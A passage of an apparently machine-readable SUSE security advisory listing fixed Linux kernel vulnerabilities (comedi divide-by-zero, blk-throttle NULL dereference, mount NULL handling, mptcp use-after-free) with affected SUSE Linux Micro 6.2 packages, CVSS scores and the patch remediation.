"text": "https://www.suse.com/security/cve/CVE-2025-40106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: fix divide-by-zero in comedi_buf_munge()\n\nThe comedi_buf_munge() function performs a modulo operation\n`async-\u003emunge_chan %= async-\u003ecmd.chanlist_len` without first\nchecking if chanlist_len is zero. If a user program submits a command with\nchanlist_len set to zero, this causes a divide-by-zero error when the device\nprocesses data in the interrupt handler path.\n\nAdd a check for zero chanlist_len at the beginning of the\nfunction, similar to the existing checks for !map and\nCMDF_RAWDATA flag. When chanlist_len is zero, update\nmunge_count and return early, indicating the data was\nhandled without munging.\n\nThis prevents potential kernel panics from malformed user commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40106",
"url": "https://www.suse.com/security/cve/CVE-2025-40106"
},
{
"category": "external",
"summary": "SUSE Bug 1252891 for CVE-2025-40106",
"url": "https://bugzilla.suse.com/1252891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40106"
},
{
"cve": "CVE-2025-40147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-throttle: fix access race during throttle policy activation\n\nOn repeated cold boots we occasionally hit a NULL pointer crash in\nblk_should_throtl() when throttling is consulted before the throttle\npolicy is fully enabled for the queue. Checking only q-\u003etd != NULL is\ninsufficient during early initialization, so blkg_to_pd() for the\nthrottle policy can still return NULL and blkg_to_tg() becomes NULL,\nwhich later gets dereferenced.\n\n Unable to handle kernel NULL pointer dereference\n at virtual address 0000000000000156\n ...\n pc : submit_bio_noacct+0x14c/0x4c8\n lr : submit_bio_noacct+0x48/0x4c8\n sp : ffff800087f0b690\n x29: ffff800087f0b690 x28: 0000000000005f90 x27: ffff00068af393c0\n x26: 0000000000080000 x25: 000000000002fbc0 x24: ffff000684ddcc70\n x23: 0000000000000000 x22: 0000000000000000 x21: 0000000000000000\n x20: 0000000000080000 x19: ffff000684ddcd08 x18: ffffffffffffffff\n x17: 0000000000000000 x16: ffff80008132a550 x15: 0000ffff98020fff\n x14: 0000000000000000 x13: 1fffe000d11d7021 x12: ffff000688eb810c\n x11: ffff00077ec4bb80 x10: ffff000688dcb720 x9 : ffff80008068ef60\n x8 : 00000a6fb8a86e85 x7 : 000000000000111e x6 : 0000000000000002\n x5 : 0000000000000246 x4 : 0000000000015cff x3 : 0000000000394500\n x2 : ffff000682e35e40 x1 : 0000000000364940 x0 : 000000000000001a\n Call trace:\n submit_bio_noacct+0x14c/0x4c8\n verity_map+0x178/0x2c8\n __map_bio+0x228/0x250\n dm_submit_bio+0x1c4/0x678\n __submit_bio+0x170/0x230\n submit_bio_noacct_nocheck+0x16c/0x388\n submit_bio_noacct+0x16c/0x4c8\n submit_bio+0xb4/0x210\n f2fs_submit_read_bio+0x4c/0xf0\n f2fs_mpage_readpages+0x3b0/0x5f0\n f2fs_readahead+0x90/0xe8\n\nTighten blk_throtl_activated() to also require that the throttle policy\nbit is set on the queue:\n\n return q-\u003etd != NULL \u0026\u0026\n test_bit(blkcg_policy_throtl.plid, q-\u003eblkcg_pols);\n\nThis prevents blk_should_throtl() from accessing throttle group state\nuntil policy data has been attached to blkgs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40147",
"url": "https://www.suse.com/security/cve/CVE-2025-40147"
},
{
"category": "external",
"summary": "SUSE Bug 1253344 for CVE-2025-40147",
"url": "https://bugzilla.suse.com/1253344"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40147"
},
{
"cve": "CVE-2025-40195",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40195"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmount: handle NULL values in mnt_ns_release()\n\nWhen calling in listmount() mnt_ns_release() may be passed a NULL\npointer. Handle that case gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40195",
"url": "https://www.suse.com/security/cve/CVE-2025-40195"
},
{
"category": "external",
"summary": "SUSE Bug 1253500 for CVE-2025-40195",
"url": "https://bugzilla.suse.com/1253500"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40195"
},
{
"cve": "CVE-2025-40257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix a race in mptcp_pm_del_add_timer()\n\nmptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, \u0026entry-\u003eadd_timer)\nwhile another might have free entry already, as reported by syzbot.\n\nAdd RCU protection to fix this issue.\n\nAlso change confusing add_timer variable with stop_timer boolean.\n\nsyzbot report:\n\nBUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\nRead of size 4 at addr ffff8880311e4150 by task kworker/1:1/44\n\nCPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\n sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631\n mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362\n mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174\n tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361\n tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441\n tcp_v4_do_rcv+0x98b/0xbf0 